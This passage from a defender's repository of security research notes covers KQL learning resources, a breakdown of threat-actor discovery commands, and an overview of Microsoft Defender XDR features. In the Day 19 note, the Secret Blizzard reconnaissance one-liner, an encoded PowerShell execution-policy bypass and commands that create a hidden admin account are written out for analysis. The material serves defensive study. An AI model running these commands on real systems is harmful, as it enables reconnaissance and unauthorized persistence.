(MTP) webinar: Tracking the Adversary E1: KQL Fundamentals](https://www.youtube.com/watch?v=0D9TkGjeJwM). 119 | 2. [M365 Defender (MTP) webinar: Tracking the Adversary E2: Joins](https://www.youtube.com/watch?v=LMrO6K5TWOU). 120 | 3. [M365 Defender (MTP) webinar: Tracking the Adversary E3: Summarizing, Pivoting, and Visualizing Data](https://www.youtube.com/watch?v=UKnk9U1NH6Y). 121 | 4. [M365 Defender (MTP) webinar: Tracking the Adversary E4 Let’s hunt! Applying KQL to incident tracking](https://www.youtube.com/watch?v=2EUxOc_LNd8&list=RDCMUCGTUbqE3SJiLgtvWjIkSQuQ&index=3).
122 | 123 | - #### Microsoft Sentinel webinar / KQL part 1-3 124 | After attending the Microsoft 365 Defender Webcast, I continued to explore KQL in greater depth. For those using Microsoft Sentinel and Azure Data Explorer, these webinars can provide an excellent starting point for learning KQL. 125 | 126 | 1. [Azure Sentinel webinar: KQL part 1 of 3 - Learn the KQL you need for Azure Sentinel!](https://www.youtube.com/watch?v=EDCBLULjtCM) 127 | 2. [Azure Sentinel webinar: KQL part 2 of 3 - KQL hands-on lab exercises!](https://www.youtube.com/watch?v=YKD_OFLMpf8) 128 | 3. [Azure Sentinel webinar: KQL part 3 of 3 - Optimizing Azure Sentinel KQL queries performance!](https://www.youtube.com/watch?v=jN1Cz0JcLYU) 129 | 130 | #### Disclaimer 131 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 132 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day19-ThreatActor-Discovery.md: -------------------------------------------------------------------------------- 1 | # Day 19 - Threat actor, discovery techniques 2 | 3 | Hello, all defenders, 4 | 5 | During the holidays, I had a chance to read Microsoft Security blogs about Secret Blizzard, Russia-based nation-state threat actor. 6 | In Part 2 of the blog, I noticed they used a batch file to collect device information, and the commands were excessively long. 7 | This time, I would like to break down each command. Additionally, I'd like to explore how other threat actors have used discovery techniques. 8 | 9 | ## Secret Blizzard 10 | Microsoft's Security blog provides insights into attacks linked to the Russian nation-state actor, which Microsoft tracks as **Secret Blizzard** and other security vendors called as Turla, Waterbug, Venomous Bear, Snake, Turla Team, or Turla APT Group. 11 | According to the blog, Secret Blizzard is recognized for targeting diverse industries, with a particular focus on ministries of foreign affairs, embassies, government agencies, defense organizations, and defense-related enterprises globally. 12 | Secret Blizzard aims to maintain long-term access to systems for intelligence gathering. They use multiple backdoors, including peer-to-peer and C2 communication tools. During attacks, they steal documents, PDFs, and email content. 13 | 14 | - December 4, 2024, [Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage](https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage/) 15 | - December 11, 2024, [Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine](https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/) 16 | 17 | ***Blog Part II*** mentions that the attacker used a reconnaissance tool, a batch file to collect device information. However, the command used is incredibly long, and I will deep dive into each command. 18 | 19 | ### Command : 20 | 21 | ![image](https://github.com/user-attachments/assets/9436fe51-0d45-4a76-b528-dd26a7906f02) 22 | 23 | ```cmd 24 | ver & systeminfo & ipconfig -all & ipconfig /displaydns & route print & arp -a & netstat -a -n & net share & net use & net user & whoami /all & wmic useraccount get name,sid & net localgroup & net accounts & net config & net time \\127.0.0.1 & set & netsh firewall show portopening & netsh firewall show allowedprogram & netsh firewall show config & tasklist /v & tasklist /svc & echo . | powershell get-hotfix & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /s & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA & dir /x c:\ & dir /x c:\users\ & dir %tmp% & dir "c:\program files (x86)" /x & dir "c:\program files" /x & tree "%UserProfile%\Desktop" /A & tree "%UserProfile%\Documents" /A & tree "%UserProfile%\Downloads" /A & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce & dir /x "c:\windows\microsoft.net\framework" 25 | ``` 26 | 27 | ### Techniques tables 28 | | Command | Description | Attacker's Purpose | 29 | |:----------------------|:-------------------------------------|:-------------------------------------| 30 | | ver | Displays the Windows version. | Identifies the OS version to tailor attacks (e.g., compatible exploits). | 31 | | systeminfo | Lists detailed system information, including OS build, hardware, and hotfixes. | Gathers information on installed patches, hardware, and OS for vulnerability identification. | 32 | | ipconfig | Shows network configuration details like IP address, DNS, and gateway. | Collects network information to locate targets or misconfigured systems. | 33 | | route | Displays the routing table for network traffic. | Identifies network routes to understand potential pathways for lateral movement. | 34 | | arp | Displays the ARP table (MAC-to-IP mappings). | Maps connected devices in the network to identify targets. | 35 | | netstat | Shows active network connections, listening ports, and their states. | Discovers open ports and active connections for reconnaissance or pivoting. | 36 | | net | A suite of subcommands for managing network resources and users | Gathers user, group, and shared resource details to find misconfigurations or potential entry points. | 37 | | whoami | Displays the current user and security group memberships. | Confirms privileges and checks group memberships for possible privilege escalation. | 38 | | wmic | Queries system management information (e.g., user accounts, processes). | Enumerates users, processes, and services to identify vulnerabilities or attack opportunities. | 39 | | set | Displays environment variables. | Finds useful environment variables for potential exploitation (e.g., paths, credentials, or temporary files). | 40 | | netsh | Manages network and firewall settings. | Checks firewall rules to identify allowed programs or open ports for bypassing security. | 41 | | tasklist | Displays running processes and associated services. | Identifies active processes for privilege escalation or identifying security software. | 42 | | powershell get-hotfix | Lists installed updates on the system. | Identifies missing updates for known vulnerabilities to exploit. | 43 | | reg query | Queries registry keys and values. | Inspects critical registry entries for persistence mechanisms, security settings, or misconfigurations. | 44 | | dir | Lists the contents of directories, including file names and attributes. | Finds sensitive files, such as configurations or credentials. | 45 | | tree | Displays the directory structure in a tree format. | Quickly maps the folder hierarchy to locate valuable files or paths. | 46 | 47 | ### Breakdown with discovery sub category : 48 | 49 | **1) System Information Gathering** 50 | 51 | ver 52 | systeminfo 53 | set 54 | 55 | 56 | **2) Network Configuration and Connectivity** 57 | 58 | ipconfig -all 59 | ipconfig /displaydns 60 | route print 61 | arp -a 62 | netstat -a -n 63 | 64 | **3) User Enumeration** 65 | 66 | Here are the details of each command from the top. 67 | - List current user and associated privileges 68 | - Retrieve all local user accounts and their SIDs 69 | - Retrieve local user account details 70 | - List local groups and group memberships 71 | -------------------------------------------------- 72 | whoami /all 73 | wmic useraccount get name,sid 74 | net user 75 | net localgroup 76 | 77 | 78 | **4) Shared Resources and Connections** 79 | 80 | Here are the details of each command from the top. 81 | - Enumerate shared resources 82 | - List mapped network drives and active SMB connections 83 | -------------------------------------------------- 84 | net share 85 | net use 86 | 87 | **5) System Configuration** 88 | 89 | Here are the details of each command from the top. 90 | - Retrieve account policies such as password policies 91 | - List workstation or server configurations 92 | - Query the system time of the local machine 93 | ------------------------------------------------- 94 | net accounts 95 | net config 96 | net time \\127.0.0.1 97 | 98 | **6) Firewall and Security Policies** 99 | 100 | netsh firewall show portopening 101 | netsh firewall show allowedprogram 102 | netsh firewall show config 103 | 104 | **7) Process and Service Enumeration** 105 | 106 | tasklist /v 107 | tasklist /svc 108 | 109 | **8) Patch and Hotfix Information** 110 | 111 | echo . | powershell get-hotfix 112 | 113 | **9) Registry Enumeration** 114 | 115 | Here are the details of each command from the top. 116 | - List all registry values in the System policies section 117 | - Check the status of User Account Control (UAC) 118 | - List startup programs for the current user 119 | - List startup programs for all users 120 | - List one-time startup programs 121 | - List 32-bit startup programs for all users 122 | - List one-time 32-bit startup programs 123 | -------------------------------------------------- 124 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /s 125 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA 126 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 127 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 128 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 129 | reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 130 | reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce 131 | 132 | **10) File and Directory Enumeration** 133 | 134 | Here are the details of each command from the top. 135 | - List files and directories on the root of the C drive (with short names) 136 | - List files and directories in the Users folder 137 | - List files and directories in the temporary folder 138 | - List files in the Program Files (x86) folder 139 | - List files in the Program Files folder 140 | - Display a tree structure of the user's desktop folder 141 | - Display a tree structure of the user's documents folder 142 | - Display a tree structure of the user's downloads folder 143 | - List files in the .NET Framework directory 144 | -------------------------------------------------- 145 | dir /x c:\ 146 | dir /x c:\users\ 147 | dir %tmp% 148 | dir "c:\program files (x86)" /x 149 | dir "c:\program files" /x 150 | List files in the Program Files folder. 151 | tree "%UserProfile%\Desktop" /A 152 | tree "%UserProfile%\Documents" /A 153 | tree "%UserProfile%\Downloads" /A 154 | dir /x "c:\windows\microsoft.net\framework" 155 | 156 | ## Storm-0270 157 | Microsoft's threat intelligence teams have linked several ransomware campaigns to DEV-0270, also known as Nemesis Kitten, a subgroup of the Iranian actor PHOSPHORUS. 158 | In DEV-0270, some of the discovery techniques can be seen to discovery domain, email and network information by using WMI and powershell. 159 | 160 | - September 7, 2022, [Profiling DEV-0270: PHOSPHORUS’ ransomware operations](https://www.microsoft.com/en-us/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/) 161 | 162 | ![image](https://github.com/user-attachments/assets/98dc7d8e-10c7-4d76-a054-a83e88010b35) 163 | > Figure 1. Typical DEV-0270 attack chain 164 | 165 | > [!Note] 166 | > • PHOSPHORUS is now tracked as Mint Sandstorm • DEV-0270 is now tracked as Storm-0270 167 | 168 | ### Command : 169 | ```cmd 170 | wmic computersystem get domain 171 | whoami 172 | net user 173 | ``` 174 | 175 | ```powershell 176 | # Retrieves the primary SMTP email address (SmtpAddress) of the first recipient in the list and displays it in a clean table format without headers. 177 | Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders 178 | ``` 179 | 180 | ```powershell 181 | # Finds domain controller information in the network using PowerShell. 182 | powershell.exe /c Get-WMIObject Win32_NTDomain | findstr DomainController 183 | ``` 184 | ```cmd 185 | rem Searches for "DomainController" in a file or command output. 186 | findstr.exe DomainController 187 | ``` 188 | 189 | ## Mango Sandstorm 190 | Mango Sandstorm, an Iran-based threat actor, exploited remote code execution vulnerabilities in Apache Log4j 2 (known as 'Log4Shell') on vulnerable SysAid Server instances used by their targets. 191 | 192 | - [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 193 | 194 | ![image](https://github.com/user-attachments/assets/6d346324-9dc7-4159-ba0b-22643613fc9f) 195 | > Figure 1. Observed MERCURY attack chain 196 | 197 | > [!Note] 198 | > MERCURY is now tracked as Mango Sandstorm. 199 | 200 | ### Command : 201 | ```cmd 202 | Here are the details of each command from the top. 203 | - Displays the current logged-in user (e.g., DOMAIN\Username) 204 | - Runs an encoded PowerShell script while bypassing execution policy 205 | - Shows the computer's hostname 206 | - Displays detailed network configuration information. 207 | - Lists all user accounts on the system. 208 | - Lists all accounts in the Administrators group. 209 | - Creates a new user account named admin. 210 | - Adds the admin user to the Administrators group. 211 | - Shows logged-in users and active sessions. 212 | -------------------------------------------------- 213 | cmd.exe /C whoami 214 | cmd.exe /C powershell -exec bypass -w 1 -enc UwB…. 215 | cmd.exe /C hostname 216 | cmd.exe /C ipconfig /all 217 | cmd.exe /C net user 218 | cmd.exe /C net localgroup administrators 219 | cmd.exe /C net user admin * /add 220 | cmd.exe /C net localgroup Administrators admin /add 221 | cmd.exe /C quser 222 | ``` 223 | 224 | #### Disclaimer 225 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 226 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day15-XDR-Insights-2024update.md: -------------------------------------------------------------------------------- 1 | # XDR Insights, Microsoft Security in 2024 2 | [Date : 2024-02-05] 3 | 4 | Hello, all defenders !! Thank you for visiting security research note. 5 | As we have seen a number of updates about XDR at Microsoft Ignite last year, at this time, I would like to introduce new features and share insights about XDR, specifically what we can do by leveraging these powerful tools. 6 | 7 | By the way, this is the updated XDR blog. If you want to see the previous one, you can also check here. 8 | 9 | 👉 [Day09-XDR-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md) 10 | 11 | Before we delve deeper into XDR... for those who are hearing this term for the first time, 12 | 13 | > [!Important] 14 | > **What is XDR ?** 15 | > 16 | > Extended Detection and Response (XDR) describes ***a unified security incident detection and response platform that automatically collects and correlates data from multiple proprietary security components***, 17 | as recognized by Gartner® Innovation Insight for Extended Detection and Response. 18 | 19 | #### Microsoft Defender XDR ? 20 | Microsoft Security provides XDR solution – ***Microsoft Defender XDR*** (formerly Microsoft 365 Defender). To avoid any confusion for those familiar with Microsoft 365 Defender, let me take a moment to explain its history and provide the latest update. 21 | 22 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ac502e17-c76e-4531-bda4-c48f1304c9a5) 23 | > Microsoft Security with XDR solution 24 | 25 | ## Gartner® Magic Quadrant™ 26 | Recently, Microsoft announced a blog about the market research results for Endpoint Protection (including XDR)[^1] - naming it ***Leader position*** again. 27 | As shown in the results over the past three years, Microsoft has consistently maintained its position as a Leader[^2][^3]. 28 | 29 | [^1]: [Microsoft is named a Leader in the 2023 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2024/01/12/microsoft-is-named-a-leader-in-the-2023-gartner-magic-quadrant-for-endpoint-protection-platforms/) 30 | [^2]: [Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant](https://www.microsoft.com/en-us/security/blog/2021/05/11/gartner-names-microsoft-a-leader-in-the-2021-endpoint-protection-platforms-magic-quadrant/) 31 | [^3]: [Microsoft is named a Leader in the 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2023/03/02/microsoft-is-named-a-leader-in-the-2022-gartner-magic-quadrant-for-endpoint-protection-platforms/) 32 | 33 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/433e2d01-c8bc-4e23-8596-fe2c54ece314) 34 | 35 | > Gartner® Magic Quadrant™ 2021 - 2023 36 | 37 | ## Combined incidents queue, XDR 38 | Thanks to the power of XDR, Microsoft Defender XDR incidents continuously provide excellent correlation capabilities, consolidating multiple Defender alerts and all affected entities into a cohesive view - ***a single unified incident***. 39 | The update to the XDR, especially in the incident section, is as follows: 40 | Last year, Microsoft announced at Ignite that Microsoft Defender XDR would incorporate cloud workload alerts, signals, and asset information from Microsoft Defender for Cloud[^4]. Now, as of January 2024, this integration is ***generally available***. 41 | 42 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/31ad8d4d-946a-4860-8fe9-1f41183f325e) 43 | > Detection of cryptojacking in Microsoft Defender XDR 44 | 45 | > [!Important] 46 | > **(GA)** Microsoft Defender for Cloud alerts integration with Microsoft Defender XDR is ***now generally available*** - [January 2024](https://learn.microsoft.com/en-us/microsoft-365/security/defender/whats-new?view=o365-worldwide#january-2024). 47 | > Learn more about the integration in Microsoft Defender for Cloud in Microsoft Defender XDR. 48 | 49 | [^4]: [Ignite news: XDR in an era of end-user-to-cloud cyberattacks and securing the use of AI](https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/ignite-news-xdr-in-an-era-of-end-user-to-cloud-cyberattacks-and/ba-p/3982002) 50 | 51 | ## Automatic attack disruption 52 | Automatic attack disruption in Microsoft Defender XDR uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***. 53 | 54 | > [!Note] 55 | > What is the objective of attack disruption? - 56 | > The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are three actions that can be taken: 57 | > | Source | Action | 58 | > |:--------------------------------|:---------------------------------| 59 | > | Microsoft Defender for Identity | - [Disable user in Active Directory](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) | 60 | > | Microsoft Defender for Endpoint | - [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network)
- [Contain user from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-user-from-the-network) - ***(NEW ACTION)*** | 61 | 62 | Microsoft Defender XDR provides coverage for the following three advanced attacks to disrupt further progression. 63 | 64 | | Advanced attack | Microsoft Security blog | 65 | |:----------------|:------------------------| 66 | | Adversary-in-the-middle attacks (AiTM) | [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751)| 67 | | Business email compromise (BEC) | [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) | 68 | | Human-operated ransomware attacks | [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) | 69 | | SAP financial process manipulation ***(NEW)*** | [Gaining control of SAP applications security and automatic attack disruption](https://www.youtube.com/live/-ijnGxRnwks?si=wcoSa2LHFGJlhW9G) | 70 | 71 | As there have been various SAP-related breaches during Covid-19, and it's quite challenging to identify them without correlation with other product signals, the SAP connector was released in Microsoft Sentinel[^5]. 72 | This helps in visualizing SAP activities and detection, providing out-of-the-box detection as well as customizable detection for SOC personnel. 73 | ***Additionally, SAP financial process manipulation has been added to scenarios in Automatic Attack Disruption in Microsoft Defender XDR !!*** 74 | 75 | > [!Important] 76 | > SAP financial process manipulation is currently in private preview. 77 | 78 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/89880caa-474f-4df7-8ba0-5f5c3d1bff66) 79 | > SAP financial process manipulation, Incident page in Microsoft Defender XDR 80 | 81 | [^5]: [Protecting your SAP environment from threats | Microsoft Sentinel in the Field #8](https://youtu.be/Yhc8vtiU0bo?si=uyDysgDjdTtmCKce) 82 | 83 | ## Deception 84 | Deception is a new capability in XDR, and personally, the Ignite event left me both confused and pleasantly surprised. 85 | Deception's objective is to deceive someone, and in this case, the target is an attacker. However, this is not only to deceive them but specifically to ***visualize the attacker's footprint***. 86 | Microsoft Defender XDR achieves this by creating ***fake accounts, devices, and content strategically designed to entice and provoke, providing insights into the attacker's actions.*** 87 | 88 | To do the deception, "decoys" and "lures" are super important.... 89 | 90 | ***What are decoys and lures ?....*** 91 | | Type | Details | 92 | |:-------|:---------| 93 | | Decoys | These are ***fake devices and accounts*** that appear to belong to your network. When an attacker engages with decoys, alerts will be generated, and you will be able to see the activities in the Incident page of the Microsoft Defender XDR portal. | 94 | | Lures | These are ***fake contents, such as documents and batch files***, strategically planted on specific devices or accounts to attract an attacker. | 95 | 96 | **👉 These are great resources to catch up on deception features.** 97 | 1. [Manage the deception capability in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/deception-overview?view=o365-worldwide) 98 | 2. [Ignite News: Augment your EDR with deception tactics to catch adversaries early](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/ignite-news-augment-your-edr-with-deception-tactics-to-catch/ba-p/3982253) 99 | 3. [Virtual Ninja Training : Microsoft Defender for Endpoint deception](https://www.youtube.com/live/k2QxyVH--vU?si=_UT46YWTDPS6wyTZ) 100 | 101 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b4a0b1f9-1d32-49ad-a79f-9ef6f8cdd625) 102 | > Deception technology, through high confidence detections of human-operated lateral movement, alerts security teams when an attacker interacts with fake hosts or lure 103 | 104 | ## Security Copilot 105 | We have been seeing a number of updates and enhancements regarding Microsoft Defender XDR, and additionally, Microsoft Security Copilot is coming soon. 106 | What I can say is only this is a ***game-changer***. 107 | 108 | At first, there are two different experiences you will see in Security Copilot. 109 | - [x] **Standalone** : This includes experiences such as asking questions across security products in the Security Copilot portal. 110 | - [x] **Embedded** : This is literally Security Copilot embedded into the Microsoft Defender XDR portal, and security teams can leverage this for dealing with day-to-day security incidents and responses. 111 | 112 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/58a7b75e-909d-4f0e-9529-44db2773e440) 113 | > Security Copilot : Standalone & Embedded 114 | > 115 | > 👉 Check this out !! [Microsoft Security Copilot drives new product integrations at Microsoft Ignite to empower security and IT teams](https://www.microsoft.com/en-us/security/blog/2023/12/06/microsoft-security-copilot-drives-new-product-integrations-at-microsoft-ignite-to-empower-security-and-it-teams/) 116 | 117 | Here are some things you can leverage Microsoft Security Copilot !! 118 | 1. Summarize incidents quickly 119 | 2. Take action on incidents through guided responses 120 | 3. Get results fast when analyzing scripts and codes 121 | 4. Generate KQL queries from natural-language input 122 | 5. Write incident reports efficiently 123 | 124 | For more details, you can explore several resources to understand how Security Copilot works. However, I would like to emphasize the following five points that highlight how our SOC world is changing, as I mentioned – **"truly a game-changer"**. 125 | 126 | ***Before Security Copilot.....*** 127 | 128 | 1. The SOC team has triaged an incident and identified what is happening across multiple domains, including email, endpoint, identity, data, and more. 129 | ***Now, Security Copilot helps us understand incidents right away without spending additional time[^6].*** 130 | 131 | 2. The SOC team investigates incidents and makes decisions for each asset based on the type of attacks. 132 | Sometimes, this can be challenging. However, Security Copilot helps by ***suggesting recommendations such as Triage, Containment, Investigation, and Remediation for each specific attack[^7]***. 133 | 134 | 3. The SOC team also needs to analyze scripts to determine the type of command executed, and decryption/decoding may be required depending on the attacks. 135 | While Microsoft Defender for Endpoint excels in capturing script execution, understanding the content still requires specific skills and knowledge. 136 | However, Security Copilot ***immediately analyzes the code written in the script and informs us about what is exactly happening.*** This helps the SOC team save time in script analysis[^8]. 137 | 138 | 4. KQL in Advanced Hunting is the most powerful tool in Microsoft Defender XDR, allowing us to view activities as raw data by controlling KQL. 139 | However, writing a query from scratch can be a challenge, especially for those unfamiliar with Microsoft. 140 | Security Copilot ***addresses this issue by assisting in generating KQL queries through questions or requests made to the tool[^9]***. 141 | 142 | 5. The SOC team usually writes incident reports in the form of logs, which can be time-consuming. 143 | Security Copilot streamlines this process by ***generating incident reports and even creating PowerPoint slides in standalone portal[^10]***. 144 | 145 | [^6]: [Summarize an incident with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-incident-summary?view=o365-worldwide) 146 | [^7]: [Use guided responses with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-guided-response?view=o365-worldwide) 147 | [^8]: [Analyze scripts and codes with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-script-analysis?view=o365-worldwide) 148 | [^9]: [Microsoft Security Copilot in advanced hunting](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-security-copilot?view=o365-worldwide) 149 | [^10]: [Create an incident report with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-create-incident-report?view=o365-worldwide) 150 | 151 | ## What's next ? 152 | Unified XDR & SIEM is coming soon !! As of now, this is still in private preview, but I hope the public preview is coming soon. 153 | - [Microsoft Defender XDR, Security Copilot & Microsoft Sentinel now in one portal](https://youtu.be/snV2joMnSlc?si=5NCzOqppxtubZQsr) 154 | 155 | #### Disclaimer 156 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 157 | --------------------------------------------------------------------------------